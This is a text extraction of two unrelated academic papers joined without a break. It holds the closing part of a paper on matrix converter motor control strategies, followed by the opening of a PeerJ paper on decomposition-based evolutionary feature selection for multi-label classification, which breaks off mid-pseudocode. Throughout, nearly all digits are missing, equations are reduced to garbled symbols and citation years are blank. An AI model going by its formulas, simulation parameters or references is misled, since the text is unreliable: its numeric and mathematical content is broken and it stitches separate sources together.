entirely based on ideal input and expectations output, it unrelated to the actual input and output and non- suppression to harmonic, robustness of the input, voltage space vector can be introduced as a negative feedback to closed loop control[ ]. b. hysteresis current comparative method hysteresis current comparison method can combine with vector control, namely use vector control to the motor and obtain the stator three-phase reference current to control matrix converter by using hysteresis current comparison method, which specific realization can be divided into indirect and direct method by whether to adopt the virtual dc link thought. concrete realization of the direct method as follows: when hysteresis current comparator requires to increase a phase current, at this time turn-on the input voltage maximum phase; when hysteresis current comparator requires to decrease a phase current, at this time turn-on the input voltage minimum phase[ ]. indirect method is the matrix converter equivalent to the ac - dc - ac structure of abolition of dc link, in which hysteresis current comparison method control inverter part, and output voltage of the rectifier linkupn is the dc bus voltage of inverter link. dc bus voltage of equivalent ac - dc - ac structure is a three-phase input line voltage and fluctuate range from zero to the maximum of input line voltage. therefore, the dc bus voltage of equivalent ac - dc - ac structure is present of high, middle and low range of options. the range of high voltage including [ . maxu , maxu ], the range of middle voltage including [ . umax, . umax], the range of low voltage including [ , . maxu ], maxu is the maximum of input line voltage. it can be seen that the direct method is essentially an indirect method of dc bus select the high voltage. hysteresis current comparison method set up the premise that the dc bus voltage is greater than the motor stator emf. when the dc bus voltage of the matrix converter is equivalent to the ac - dc - ac structure is small, there may be turn up the situation of the dc bus voltage less than the stator emf. at this point, hysteresis current comparison method to actual control on the current effect opposite to expectations and consequently exacerbated, this will increase current and torque ripple and reduce system performance. therefore, the dc bus voltage chooses generally high voltage. simulate research to matrix converter motor system vector control of adopted hysteresis current comparison method using matlab/simulink. in which dc bus voltage use high voltage and motor use the three-phase four-pole squirrel-cage induction motor. rs = . Ω, rr = . Ω, ls = lr = mh, lm = . mh and current hysteresis width is a. initialize torque as the value of n.m, . s step to n.m; speed set rad / s. speed controller adopt pid controller. simulation waveform of vector control of matrix converter motor system is shown in figure to figure . figure . the rev and torque of motor figure . the stator electrical current of a the control of the rectifier part is only provided dc bus voltage to the inverter, actually we can through adopt space vector modulation to achieved power factor correction to the input the rectifier, but there is a international journal of advanced network, monitoring and controls volume , no. , problem that when the output voltage as middle voltage or zero voltage in the rectification part, hysteresis current comparative method in the inverter failure and thus effect the vector control. the waveform of rectifier link using space vector modulation simulation is shown in figure to figure . space vector modulation can also be combined with vector control, stator reference current obtain by vector control convert into the stator reference voltage, using space vector modulation, input power factor get from rectification links and inverter part generated the requirements reference voltage[ ]. c. direct torque control the combination of direct torque control and matrix converter control can be interpreted using matrix converter output voltage space vector. figure . the rev and torque of motor figure . the stator electrical current of a three-phase / three phase matrix converter has a total of switch states and corresponds to the voltage vectors. they can be divided into three categories: ①zero voltage vector; ②amplitude changes, voltage vector of constant phase angle; ③ fixed amplitude, voltage vector of phase angle. direct torque control to qualitative control of torque and stator flux amplitude by using hysteresis comparator. the phase angles of voltage vector determine its nature of the role of change stator flux and torque and amplitude determine the size. the fluctuation of voltage vector amplitude does not affect the feasibility of direct torque control. for the third type of voltage vector, system requires real-time information of voltage vector phase angle to determine its change role to torque and flux. in order to reduce the burden on the system, the matrix converter motor direct torque control system generally select only the first and second voltage vector. therefore, there are three different voltage vector amplitude has the same phase angle any time, the presence of high, medium and low options. following paper will analyses high, medium and low voltage vector effect on the system performance. because the same sampling time, the higher voltage vector magnitude, the greater torque ripple caused, dynamic performance is proportional to voltage vector amplitude. figure . the torque and rev of motor figure . the error of torque Δte international journal of advanced network, monitoring and controls volume , no. , the torque ripple of direct torque control system can be divided into two categories: first, in the constant sampling period, the torque ripple caused by discrete is proportional to the input line voltage amplitude. second, torque ripple caused by the failure of the direct torque control. direct torque control to select the forward voltage vector and increase rotor flux by increasing the angle between stator and torque. this requires the speed of stator flux rotate faster than the rotor flux. stator flux rotation speed determined by the input line voltage, so when the input line voltage is small, it will apparent the situation of increases the torque by select a system voltage vector but the actual torque decline contrary. the size of the torque ripple and the frequency is inversely proportional to the input line voltage amplitude. studies show that the high- voltage vector does not appear the failure situation of direct torque control, while medium and low voltage vectors both appearances. thus, high-voltage vector generally be chosen. simulate research to direct torque control by using the matrix converter motor system of high-voltage vector and the simulation results shown in figure to figure . by selecting the high and medium voltage vector to reduce the torque ripple of direct torque control system, the specific is that select the input line voltage is high when the system is in dynamic; select the input line voltage is middle when the system is in stable, when in the case of failure of direct torque control, select the input line voltage is high and determine the system state according to the size of the torque ripple. simulated research to the matrix converter motor direct torque control system using this strategy and the simulation results shown in figure to figure . figure . the torque and rev of motor figure . the error of torque Δte by comparison figure and figure shows that this improvement strategy can reduce the torque ripple effectively. in the rectifier link space vector modulation similar to vector control indirect method. the matrix converter is equivalent to the ac - dc - ac structure, control rectifier link using direct torque control and use space vector modulation to inverter link. vii. conclusion this paper proposed the concept of matrix converter motor system aimed at the problems of the matrix converter enter into industrial applications and research the matrix converter motor system control strategy combined matrix converter control method and motor speed method, analyzed the impact of the size of the voltage vector to hysteresis current comparator and direct torque control, and proposed to the improved control strategies of reduce the torque ripple and consider the input power factor control. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the project funds in shaanxi province university student innovation and entrepreneurship fund project (s ) and the project funds in engineering laboratory project(gsysj ). references [ ] p. w. wheeler, r. jose, c. jon, et al. matrix converters: a technology review [j]. ieee trans. on industrial electronics, , ( ): ~ . international journal of advanced network, monitoring and controls volume , no. , [ ] li yao-hua and so on. an effective way to improve voltage transfer ratio of matrix converter [j]. electric automation, , ( ): ~ . [ ] guo qian-gang, li yao-hua, meng yan-jing etc. the theoretical analysis and discuss of matrix converter voltage transfer ratio [jelectric automation, , ( ): ~ . [ ] huang ke-yuan, he yi-kang, bian song-jiang. variable speed, constant frequency, and wind power system research of matrix converter ac excitation [j]. csee, , ( ): ~ . [ ] c. klumpner, p. nielsen, i. boldea, et al. a new matrix converter motor (mcm) for industry applications [j]. ieee trans. on industrial electronics, , ( ): ~ . [ ] a. alesina, m. venturini. analysis and design of optimum amplitude nine-switch direct ac-ac converters [j]. ieee trans. on power electronics, , ( ): ~ . [ ] wang yi, chen xi-you, xu dian-guo. research to two voltage synthesis matrix converter loop control [j]. csee, , ( ): ~ . [ ] l. huber, d. borojevic. space vector modulated three phase to three phase matrix converter with input power factor correction [j]. ieee trans. on industry applications, , ( ): ~ . [ ] zhang zhi-xue, ma hao. the current control strategy of matrix converter [j]. csee, , ( ): ~ . [ ] wang yi, chen xi-you, xu dian-guo. research of space vector modulated matrix converter closed-loop control [j]. csee, , ( ): ~ . [ ] ge hong-juan, mu xin-hua, zhang shao etc. permanent magnet synchronous motor vector control model and simulation based on matrix converter [j]. mining technology university of china, , ( ): ~ .. [ ] sun kai, huang li-pei, song ta gong-gui. induction motor vector control based on matrix converter [j]. tsinghua university, , ( ): ~ . an evolutionary decomposition-based multi-objective feature selection for multi-label classification an evolutionary decomposition-based multi-objective feature selection for multi-label classification azam asilian bidgoli , hossein ebrahimpour-komleh and shahryar rahnamayan department of electrical and computer engineering, university of kashan, kashan, iran nature inspired computational intelligence (nici) lab, department of electrical, computer, and software engineering, ontario tech university, oshawa, on, canada abstract data classification is a fundamental task in data mining. within this field, the classification of multi-labeled data has been seriously considered in recent years. in such problems, each data entity can simultaneously belong to several categories. multi-label classification is important because of many recent real-world applications in which each entity has more than one label. to improve the performance of multi-label classification, feature selection plays an important role. it involves identifying and removing irrelevant and redundant features that unnecessarily increase the dimensions of the search space for the classification problems. however, classification may fail with an extreme decrease in the number of relevant features. thus, minimizing the number of features and maximizing the classification accuracy are two desirable but conflicting objectives in multi-label feature selection. in this article, we introduce a multi-objective optimization algorithm customized for selecting the features of multi-label data. the proposed algorithm is an enhanced variant of a decomposition-based multi-objective optimization approach, in which the multi-label feature selection problem is divided into single-objective subproblems that can be simultaneously solved using an evolutionary algorithm. this approach leads to accelerating the optimization process and finding more diverse feature subsets. the proposed method benefits from a local search operator to find better solutions for each subproblem. we also define a pool of genetic operators to generate new feature subsets based on old generation. to evaluate the performance of the proposed algorithm, we compare it with two other multi-objective feature selection approaches on eight real-world benchmark datasets that are commonly used for multi-label classification. the reported results of multi-objective method evaluation measures, such as hypervolume indicator and set coverage, illustrate an improvement in the results obtained by the proposed method. moreover, the proposed method achieved better results in terms of classification accuracy with fewer features compared with state-of-the-art methods. subjects artificial intelligence, data mining and machine learning, optimization theory and computation keywords feature selection, multi-label classification, multi-objective optimization, decomposition-based algorithm, evolutionary algorithm how to cite this article asilian bidgoli a, ebrahimpour-komleh h, rahnamayan s. . an evolutionary decomposition-based multi- objective feature selection for multi-label classification. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published march corresponding author azam asilian bidgoli, asilian@grad.kashanu.ac.ir academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright asilian bidgoli et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:asilian@�grad.�kashanu.�ac.�ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction in traditional classification approaches, each sample in a dataset belongs to one class. however, in recent years, to adapt to real-world problems, researchers have studied multi-label learning (zhang & zhou, ). in such problems, each sample in a dataset can simultaneously belong to several classes. therefore, a set of labels is defined for each data entity. because this is supervised learning, the objective of the classification is to create a model by using the training data to predict the unseen data labels. in real-world applications, it is less common for each entity to have exactly one label; for this reason, this is an important direction for research. in multi-label text classification, each text sample can simultaneously belong to different classes (such as “politics” and “sports”) (ueda & saito, ). another example is digital image classification: an image sample may contain a mountain, lake, and tree; hence, the image is included in each of the classes (boutell et al., ). in the functional classification of genes, every gene is also a member of different functional classes (such as “metabolism” and “protein synthesis”) (li, miao & pedrycz, ). the accuracy of a classification task strongly depends on the selected features that provide the most relevant knowledge about the data to construct a reliable model. feature selection is a data mining preprocessing task that removes irrelevant and redundant features. it reduces computational complexity in the learning process and improves the classifier’s performance (zhang, gong & rong, ). in multi-label datasets, each sample is related to more than one label, and the corresponding labels are not necessarily independent of each other; hence, feature selection in such a dataset is more complicated than in single-label classification (zhang et al., ). several researchers have reported that classification performance can be improved using a proper feature selection strategy in multi-label data (madjarov et al., ; lee & kim, ; dembczynski et al., ). the feature selection methods for both multi-label and single-label datasets can be divided into three categories: wrapper, filter, and embedded methods (pereira et al., ). the wrapper methods select the features based on the resulting classification performance; hence, the learning task is a part of the feature selection process. additionally, wrapper methods have been used for multi-label data feature selection (dendamrongvit, vateekul & kubat, ; wandekokem, varejão & rauber, ). in filter methods, the best set of features is selected using the statistical characteristics of data (e.g., the correlation among features and classes). many filter-based feature selection methods have been proposed for multi-label data (spolaôr et al., a, b; reyes, morell & ventura, ; lin et al., ; li, miao & pedrycz, ). the embedded methods select best subset of features as a integrated part of the learning algorithm. one of the well-known embedded methods is decision tree algorithm (safavian & landgrebe, ). this classifier constructs a tree structure model which selects best feature at each node in term of a discriminancy criterion. to obtain the best subset of features out of d features, we need to evaluate d possible subsets. consequently, selecting the best subset out of all possible subsets is extremely time-consuming; therefore, it is not practical to employ a brute force approach. in fact, feature selection is an np-hard problem (chandrashekar & sahin, ; asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blum & langley, ). therefore, the use of meta-heuristic search strategies, such as evolutionary algorithms, can be beneficial in this regard (ibrahim et al., b, el aziz & hassanien, ; elaziz et al., ; mousavirad & ebrahimpour-komleh, ). evolutionary algorithms have attracted significant attention because they are more robust in avoiding local optima, compared with traditional optimization methods (ibrahim et al., a; elaziz et al., ). various evolutionary algorithms have been used for multi- label feature selection (zhang, pena & robles, ; lee & kim, ; reyes, morell & ventura, ; shao et al., ). some studies in feature selection have considered only classification accuracy for their optimization algorithm, whereas several other objectives can be simultaneously optimized using multi-objective optimization algorithms. although feature selection can enhance the accuracy of the classification task and decrease the computational complexity, an extreme reduction of relevant features will degrade the accuracy. on the other hand, increasing the number of appropriate features gives more relevant knowledge of data to construct an accurate model. accordingly, a massive number of features increases the computational complexity of a classification task because of the complexity of its search space. therefore, the main goal of multi-objective feature selection has two conflicting objectives, that is, to minimize the number of features while maintaining an acceptable classification accuracy (dembczynski et al., ; xue, zhang & browne, ). to the best of our knowledge, a few articles have used multi-objective optimization methods for feature selection of multi-label data. yin, tao & xu ( ) attempted to find the best subset of features by using the nondominated sorting genetic algorithm ii (nsga-ii) (deb et al., ). in another study, feature selection in multi-label datasets used a differential evolution algorithm (zhang, gong & rong, ). zhang et al. ( ) presented a particle swarm optimization (pso)-based multi-objective optimization algorithm and achieved a better accuracy compared with the previous methods. lee, seo & kim ( ) proposed an evolutionary multi-label feature selection that used dependencies between the features and labels to select more relevant features. their method selects features that have a higher level of correlation with the labels and have not been selected using genetic operators during the optimization process. in another study , the most salient features were selected by mapping the features to a multi-dimensional space based on the correlation between features and each label (kashef & nezamabadi-pour, ). however, the authors have only used the pareto-dominance concept inspired by multi-objective optimization. in other words, they do not search the features’ space using a multi-objective optimization algorithm. evolutionary-based multi-objective optimization algorithms can be divided into three categories: dominance-based, decomposition-based, and indicator-based methods (trivedi et al., ). the dominance-based methods attempt to find the solutions that optimize the objective functions by using a concept called dominance, which will be defined in the next section. all the above-mentioned studies on multi-label feature selection belong to this category of multi-objective optimization algorithms. the indicator- based methods evaluate the fitness of each solution by assessing an indicator (such as hypervolume) to improve the convergence and diversity criteria simultaneously. asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the contrary, the decomposition-based methods decompose the whole search space into smaller subproblems and solve all of them simultaneously. therefore, the convergence rate of the algorithm is significantly improved, which enhances the diversity of the obtained solutions (zhang & li, ). an advantage of decomposition-based methods is their potential for scalability to multi-objective optimization problems (zhang & li, ). research on feature selection for multi-label data has started recently; therefore, few studies have been conducted in this area, especially for multi-objective problems. the most important aim of this paper is to address this problem for multi-objective optimization. in this article, we propose a decomposition-based method for multi-label feature selection. the objective functions used in this paper include hamming loss and the number of features. the main contributions of the paper can be summarized as follows: ( ) we address the problem of multi-objective feature selection by solving several single- label subproblems, that is, for the first time, decomposition-based evolutionary multi- objective optimization has been used for multi-label classification; ( ) we apply a local search strategy to increase the exploitation power of the proposed method; ( ) we propose a hybrid crossover scheme that switches among crossover operators with a predefined probability. because some of the benchmark datasets have more than , features, we used decomposition-based algorithms, which are beneficial for large-scale problems. to validate the results, we compared the proposed method of multi-label feature selection with state-of-the-art methods. furthermore, to validate the performance of the proposed algorithm, we conducted an extensive set of experiments on real-world multi- label datasets. the results show a significant improvement compared with the other methods in terms of multi-objective evaluation measures, such as hypervolume indicator and set-coverage criterion. this article is organized as follows. “background review” describes related work on multi-label classification, multi-objective optimization, and the existing methods for multi- objective multi-label feature selection. the proposed algorithm is explained in “proposed method”. the experiments are presented in “experimental design”. “results and discussion” describes and discusses the results. finally, “concluding remarks” concludes the article. background review in the following subsections, we briefly review related concepts. we start with a brief explanation of multi-label classification to clarify the importance of this research problem. next, we explain multi-objective optimization and the corresponding challenges. finally, we examine existing multi-label feature selection methods that have been proposed for multi-objective optimization algorithms. multi-label classification if a dataset x contains d-dimensional samples and y represents the set of the q possible labels in a multi-label problem, the objective of multi-label classification is to create a model in the form of h : x ! y from m training examples, d = (xi, yi| ≤ i ≤ m). for each multi-label sample (xi, yi), xi includes a d-dimensional feature vector and yi includes asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a set of labels associated with xi. for unseen data xi, the multi-label classifier predicts h(x) as the set of labels. multi-label learning algorithms can be divided into two main categories: problem transformation and algorithm adaptation methods (zhang & zhou, ). in the problem transformation methods, the multi-label classification problem is converted into a single-label problem to classify data using existing single-label classifiers. the basic idea of the algorithm adaptation methods is to adapt single-label classifiers to deal with multi-label data. multi-label k-nearest neighbor (ml-knn) (zhang & zhou, ) is one of the most well-known adaptive methods, and it was used in this study to evaluate feature subsets. in the single-label version of this algorithm, to predict the class label of the sample, the algorithm calculates the distance between the query sample and the other samples in dataset. k neighbors (smallest distances) of the sample should be picked. the algorithm gets the labels of the selected k entries. then it returns the mode of the k labels as the class of query sample. despite its simplicity, this classifier is commonly used on various applications. in its multi-label version ml-knn, as in the single-label version, the sample would be labeled by classes in which the distribution of neighbors is higher. in this direction, decision making is performed for every class as follows: y ¼ fyijpðhjjcjÞ=pð�hjjcjÞ . ; � j � qg ( ) sample x belongs to class j if the posterior probability p(hj|cj) that x belongs to class j, providing that x has exactly cj neighbors with label yj, is bigger than p(∼hj|cj). to obtain the value of posterior probability, bayes’ theorem mentioned in eq. ( ) has been applied. the ratio of two mentioned posterior probabilities determines belonging of the sample to class j. according to this equation, the posterior probability is dependent on the values of prior probabilities (p(hj) and p(∼hj)) and likelihood functions (p(cj|hj) and p(cj|∼hj)). pðhjjcjÞ pð�hjjcjÞ ¼ pðhjÞ � pðcjjhjÞ pð�hjÞ � pðcjj�hjÞ ( ) to calculate the p(hj), we obtain the ratio of the samples that have label yj to the total samples. the value of p(cj|hj)) is also calculated using eq. ( ), where kj(r) is the number of samples in the training set that have label yj and have exactly r neighbors with label yj. based on this definition, kj(cj) is the number of samples that belong to class j and have r neighbors in this class. pðcjjhjÞ ¼ kjðcjÞxk r¼ kjðrÞ ð � j � q; � cj � kÞ ( ) because of the simplicity and popularity of ml-knn, we used this classifier to evaluate the quality of selected features in our proposed method. moreover, we use the same classifier to compare several algorithms. multi-objective optimization most real-world optimization problems involve multiple conflicting objectives (konak, coit & smith, ). hence, multi-objective optimization problems have various practical asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ applications. the use of evolutionary algorithms has been motivating for solving such problems. because of the population-based nature of these algorithms, we obtain a set of solutions on every run. in a multi-objective optimization problem, the definition of optimality is not as simple as in single-objective optimization. when the optimal solution of an objective function conflicts with an optimal solution of another objective function, the problem becomes challenging. therefore, to solve such problems, it is necessary to find a trade-off between objective functions. the obtained solutions of multi-objective algorithms are called nondominated solutions or pareto-optimal solutions. theoretically, if a multi-objective optimization problem is a minimization problem, it is formulated as follows (mirjalili et al., ). min fðxÞ ¼ ½f ðxÞ; f ðxÞ; . . . ; fmðxÞ� s:t: li � xi � ui; i ¼ ; ; . . . ; d ( ) subject to the following equality and inequality constraints: giðxÞ � j ¼ ; ; …; j hkðxÞ ¼ k ¼ ; ; …; k ( ) where m is the number of objectives, and d is the number of decision variables (dimension) of solution x, so that xi should be in interval [li,ui] (i.e., box-constraint). finally, fi is the objective function that should be minimized. to compare two candidate solutions in multi-objective problems, we can use the concept of pareto dominance. mathematically, the pareto dominance is defined as follows. if x = (x , x ,…, xd) and �x ¼ ð�x ; �x ; . . . ; �xdÞ are two vectors in the search space, x dominates �xðx � �xÞ if and only if i f ; ; . . . ; mg; fiðxÞ � fið�xÞ^ j f ; ; . . . ; mg : fjðxÞ , fjð�xÞ ( ) this means that solution x dominates solution �x (is better) if and only if the objective values of x are better than or equal to all objective values of �x (is not worse than �x in any of the values of the objective functions) and it has a better value than x in at least one of the objective functions. if the solution x is better than �x in all objectives, we call strong dominance but in the case that they have at least one equal objective, the weak dominance happens. all nondominated solutions construct a pareto front. crowding distance (deb et al., ) is another measure to compute the distribution of candidate solutions in the objective space. it is calculated using the sum of distances between each solution and its neighbors. it is computed using eq. ( ). cdi ¼ xm j¼ jfjði þ Þ � fjði � Þj; ( ) where fj(i + ) and fj(i − ) indicate the jth objective value of the previous and next neighbors of solution i. larger distance indicates a non-crowded space. hence, a selection of solutions from this region creates a better distribution. in fact, it represents the distribution of the members surrounding each solution. decomposition-based methods are a category of multi-objective optimization algorithms that decompose the asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approximation of pf into a number of single-objective optimization subproblems. all subproblems can be solved by using other classical optimization or evolutionary methods simultaneously. a strategy is required to convert a multi-objective optimization problem to single-objective one. during optimization, the trade-off relation between objectives can be applied by considering information mainly from subproblem neighboring. the neighborhood concept is defined by producing a set of weight vectors in objective space. if the subproblems are solved by evolutionary algorithms, neighbors communicate with each other to reproduce the new candidate solutions and update the existing individuals in the population. the steps of a decomposition-based method has been explained in “proposed method” section. tchebycheff method as stated before, multi-objective optimization problems can be solved by different methods. traditional multi-objective optimization methods seek a way to convert the multi-objective problem into a single-objective problem. one of these methods is the tchebycheff method (jaszkiewicz, ), which was used in this study to solve multi- objective subproblems. the tchebycheff method looks for the optimal solutions that have the minimum distance from a reference point. the single-objective optimization problem is defined as eq. ( ). minimize gteðxj�o; z�Þ ¼ maxf�ijfiðxÞ � z�i jg subject to x s; ( ) where z� = (z �,…,zm�) t is a reference point used to evaluate the quality of the obtained solutions, m is the number of objective functions, and s is the search space. according to this equation, the distances between the objective function values of each solution x and reference point z� are calculated. the single-objective optimization problem is regarded as minimizing the maximum of these distances. a uniform weight vector λ = (λ , λ ,…, λm) is defined for each solution such that pm i �i ¼ . therefore, weight λi is assigned to the objective function fi. to obtain each optimal solution of the minimization problem defined in eq. ( ), we need to find an appropriate weight vector. the obtained optimal solution would be one of the pareto optimal solutions. as a result, the traditional methods are time-consuming because of continuous changes in the weights required to obtain the best solutions. therefore, we consider a set of distributed weight vectors in the decomposition-based evolutionary methods for all the subproblems. reference point selection is another issue that should be considered in the tchebycheff method. for a minimization problem, the minimum value obtained for each objective function can be a reference point. z�i ¼ minfiðxÞjx s ( ) therefore, the value of the reference point is also updated after each iteration. figure shows the tchebycheff method for obtaining an optimal solution on the pareto front. as an example, we show that the reference point has been placed at the center of the coordinates, where the values of both objective functions are minimal. we show a sample asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ weight vector (λ , λ ), and the solutions from each iteration are shown in blue. the solutions converge toward the reference point in the direction of the weight vector until the optimal point on the pareto front (in red) is obtained. at each iteration, the previous solution is replaced with a new solution if the new one outperforms the previous one. multi-label feature selection using multi-objective evolutionary algorithms a review of the literature shows little research in the area of multi-label feature selection using multi-objective evolutionary algorithms. next, we briefly explain the state-of-the-art methods. multi-label feature selection algorithm based on nsga-ii yin, tao & xu ( ) have selected the optimal features for multi-label data classification using the nsga-ii algorithm. the hamming loss and the average precision criteria have been considered as the objective functions. this paper has yielded the pareto front using the nsga-ii algorithm. nsga-ii uses fast non-dominated sorting to rank feature subsets. the fast non-dominated sorting technique categorizes the population members in different ranks. for each solution p, the number of members for which solution p dominates and the number of members that dominate solution p are specified. all solutions that have never been dominated (members with a domination count of zero) are added to a set named f . here, f is the first pareto front that contains the best- qualified members of the current population. in the next step, the members included in f are removed from the population, and the remaining members that have never been dominated construct the second rank f . this procedure continues in the same way until all population members are ranked. at the end of the algorithm, the members of the first front f are presented as the optimal pareto front. the proposed method was tested on multi-label standard data optimal point ( , ) z* ( ) ( ) figure illustration of tchebycheff method. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classified using the ml-knn classifier. the authors compared the proposed method with several filter-based feature selection methods. pso-based multi-objective multi-label feature selection pso is a well-known population-based evolutionary algorithm. zhang et al. ( ) presented a multi-objective pso-based method for feature selection of multi-label data. they considered the number of features and accuracy of classification as conflicting objectives. in the pso algorithm, population consists of particles that have two properties: position and velocity. the position and the velocity of the i-th particle are presented as pi(t) = (pi, , pi, ,…, pi,d) and vi(t) = (vi, , vi, ,…, vi,d), respectively. the position of the particle is updated based on the previous position and velocity. moreover, the particle velocity is updated according to eq. ( ) based on two parameters: ( ) the best individual position of the particle up to now lbi(t) = (lbi, , lbi, ,…, lbi,d) and ( ) the best global position among all particles gb(t) = (gb , gb ,…, gbd). vi;jðt þ Þ ¼w vi;jðtÞ þ r c ðlbi;jðtÞ � pi;jðtÞÞ þ r c ðgbjðtÞ � pi;jðtÞÞ ( ) pi;jðt þ Þ ¼ pi;jðtÞ þ vi;jðt þ Þ ( ) where t is the number of iterations; r and r are two random vectors uniformly distributed in the range ( , ); c and c are two parameters that represent the particle’s confidence in itself and in the swarm, respectively, and w determines the effect of previous velocity, called inertia weight. generating an initial population is the first step of pso-based multi-label feature selection. then, an archive of nondominated solutions is provided. velocities and positions of all particles are updated in each iteration. we also need to update the particle’s best individual position and the best global position. the particle’s best individual position is calculated using the domination concept. in addition, the best global position is selected among the particles’ historical positions by using the crowding distance criterion. an adaptive mutation operator has been used to produce offspring; the number of the mutated elements in a particle is determined using a non-linear function. for this purpose, k variables of some particles are randomly selected to be reinitiated. the proposed method has been evaluated on standard benchmark problems using the ml-knn classifier. the results show significant improvements compared to the previous state-of-the-art methods. proposed method decomposition methods (such as the tchebycheff method) are traditional methods of multi-objective optimization. they transform the problem of approximation of the pareto front into a number of scalar optimization problems. as mentioned before, because of the continuous modifications of the objective functions’ weights for obtaining a pareto solution, these methods may be time-consuming. some of them are unable to discover all pareto points in convex problems effectively (zhang & li, ). an evolutionary algorithm can be used to overcome this problem. recently, a method based on decomposition and evolutionary algorithms (moea/d) was proposed for solving a multi- objective problem (zhang & li, ). moea/d uses evolutionary algorithms for asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ decomposition of the problem space into scalar subproblems and simultaneously solves them. hence, it increases the speed of finding pareto-optimal solutions and improves the diversity of the obtained solutions (zhang, gong & rong, ). the scalar subproblems are simultaneously solved by receiving information from neighboring subproblems; therefore, the algorithm has less computational complexity compared to the domination- based algorithms. moea/d has several advantages over pareto dominance-based algorithms, such as computational efficiency, scalability to optimization problems with many objectives , and high search ability for combinatorial optimization problems (jiang et al., ). in this article, we propose a decomposition-based multi-objective feature selection for multi-label data classification. this is the first time that a decomposition-based approach has been customized to tackle multi-label classification. figure shows the overall flowchart of the proposed method. according to the overall structure, the search process needs an encoding strategy to define the search space which is explained in the next subsection. algorithm, as an iterative process, starts with initialization step. at each reproduc�on using proposed gene�c operators encoding replacement neighbors based on tchebychef algorithm stop ini�aliza�on (popula�on, weight vectors, reference point) fitness evalua�on (number of features, hamming lose) feature subset no yes fitness value(s) number of features h a m m in g lo se pareto front of trade-off solu�ons update reference point local search to improve the pareto front figure flowchart of overall structure of the proposed method. full-size doi: . /peerj-cs. /fig- asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ iteration, based on the proposed operators, new feature subsets are created and evaluated using objective functions. using tchebychef method, the neighbors of generated solutions and reference points will be updated. after applying a local search, a set of non-dominated solutions are obtained as trade-off feature subsets. algorithm also represents the pseudo-code of the proposed method which in the following subsections, we describe the details of its main components. representation of individuals each member of the population indicates a candidate solution in the search space. in this paper, the representation of individuals for feature selection is a string with a length equal to the number of features. a cell of the vector is randomly filled with a real value between and . this representation is used in problems that need a continuous representation of the solutions (xue, zhang & browne, ). the use of real values is due to the use of continuous genetic operators. a cell with a value greater than . indicates the selection of the feature, and a value less than . indicates that a feature is not selected. if the length of the feature vector is d, the i-th population member is defined as ci(t) = (ci, , ci, ,…, ci,d). the feature subsets use the following notation: when a feature is selected, the corresponding cell value changes to ; otherwise, it becomes zero. hence, the string is converted to a binary vector, where indicates the rejection of the feature, and indicates the selection of the feature. therefore, the number of selected features is equivalent to the count of “ ” in the vector. an instance of a feature vector is shown in fig. . objective functions to acquire the best solutions in feature selection, we consider two objective functions: the number of selected features and the hamming loss. as mentioned before, the goal of feature selection is to remove irrelevant and redundant features and, therefore, to reduce the complexity of the search space in the classification task or any other feature-based process. the ratio of the features selected for each solution to all the features (a value between and ) is our first objective function. the second objective function evaluates the learning accuracy of multi-label data. the hamming loss is one of the most well-known measures for computing the classification error for multi-label data; it has been used in several papers on multi-label wrapper feature selection (zhang et al., ; yin, tao & xu, ; jungjit & freitas, ). the hamming loss evaluates the fraction of misclassified instance-label pairs, that is, a relevant label is missed, or an irrelevant one is predicted (zhang & zhou, ). the hamming loss is defined as follows: hlossðhÞ ¼ p xn i¼ q jhðxiÞdyij; ( ) where q is the number of labels, and p is the total number of multi-label samples. if xi shows the i-th sample, h(xi) represents the labels predicted by model h. moreover, yi are the actual labels of the i-th sample. Δ is the difference between the vectors of the predicted and actual labels. the hamming loss error is our second objective function for feature selection. hence, multi-objective optimization can be applied to minimize this objective as asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm . pseudo-code for the proposed method. input : np: the number of subproblems, t: the number of neighbors in the decomposition-based optimization algorithm, k: the number of neighbors in the multi-label knn classifier, r: the number of iterations output : final feature selection subsets // initialization divide multi-label data into two training and test sets; produce the weight vectors by uniformly distributed aggregation values; generate the initial population uniform randomly; evaluate the objective functions for each candidate solution according to (eq. ) using training set; compute the t neighbors for each weight vector using euclidean distance; initialize the reference point according to (eq. ); determine the non-dominated solutions in the initial population as an archive (ac); it= ; // main algorithm while it < r do for i) to np do // for each individual, xi, in the population // regeneration randomly select two candidate solutions from among the neighbors of x ; produce two new candidate solutions, y , y using the proposed genetic operators; // comparison and replacement (eq. ) for j) to t do // for each neighbor if gte(y |w j,z) ≤ gte(x |w j ,z) then xj = y end // update the reference point (eq. ) if f (y ) < z then z = f (y ) end if f (y ) < z then z = f (y ) end if gte(y |w j ,z) ≤ gte(x |w j ,z) then xj = y end // update the reference point (eq. ) if f (y ) < z then z = f (y ) end if f (y ) < z then asilian bidgoli et al. ( ), peerj comput. sci., doi 